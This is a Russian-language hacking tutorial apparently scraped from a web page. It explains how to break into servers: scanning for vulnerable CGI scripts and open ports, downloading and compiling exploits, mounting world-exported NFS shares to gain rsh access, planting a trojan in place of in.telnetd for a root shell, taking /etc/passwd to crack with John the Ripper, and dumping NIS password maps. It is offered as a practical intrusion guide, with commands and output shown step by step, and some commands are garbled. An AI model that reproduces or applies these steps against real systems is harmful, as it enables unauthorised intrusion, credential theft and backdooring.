C чего же всё таки начинать взлом сервера сайта, странички и т д - polpoz.ru o_O
Главная
Поиск по ключевым словам:
страница 1
Похожие работы
C чего же всё таки начинать взлом сервера сайта, странички и т д - страница №1/1

C чего же всё таки начинать взлом сервера (сайта, странички и т.д.)

Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr, его можно скачать с йх официального сайта http://www.cc.f2s.com/, еще правда есть сканер от группы Void () Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько ссылок где можно найти описание этих ошибок:

(наиболее полный но на Английском)



или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска:





Второе и пожалуй главное - это сканирование портов, для сканирования можно использовать любой сканнер портов(какой - на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут , этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)

После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете:

telnet>open www.target.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:







и вводите в строке поиска название программы и его версию.


После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на http://www.nether.net/ и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE)

Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем:

gcc -o exploit exploit.c и нижимаем Enter.


Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться:


>./exploit

Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e www.target.com
и видим


/user/ Everyone

или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех
дальше пишем


>mount -t nfs target.remote.com:/user /mnt

потом переходми в каталог cd /mnt/home и устанавливаем .rhosts

>echo www.target.com user/.rhosts

дальше делаем следующее:

>cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно)


> su - user
! Становимся им


$ rsh target.remote.com /bin/csh -i

Warning! No access to terminal, job control disabled!

! И заходим на удаленную машину

% id

uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)

% ls -ldg /usr/etc

! Каталог доступен на запись

drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc

% grep telnet /etc/inetd.conf

telnet stream nowait root /usr/etc/in.telnetd in.telnetd

! Нашли программу, которая запустится

!под root"ом из нашего каталога

% cd /usr/etc

% mv in.telnetd in.telnetd1

! создаем троянского коня

% cat in.telnetd

>!/bin/sh

exec /bin/csh -i


% chmod 755 in.telnetd


! и запускаем его

% telnet 127.1

Connecting 127.1.

Warning! No access to terminal, job control disabled!

> chown user /etc;

! Делаем /etc своим

: command not found

> exit;

: command not found

Connection closed by foreign host.

> cd /etc

После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс - John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе!

И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p www.target.com | grep bind и если видим что-то типа


120000 2 udp 2493 ypbind

То пробуем сдлать следующее:

>ypx -o target.passwd -g target.remote.com

Берём файл с паролями и запускаем подборщик.

На этом все!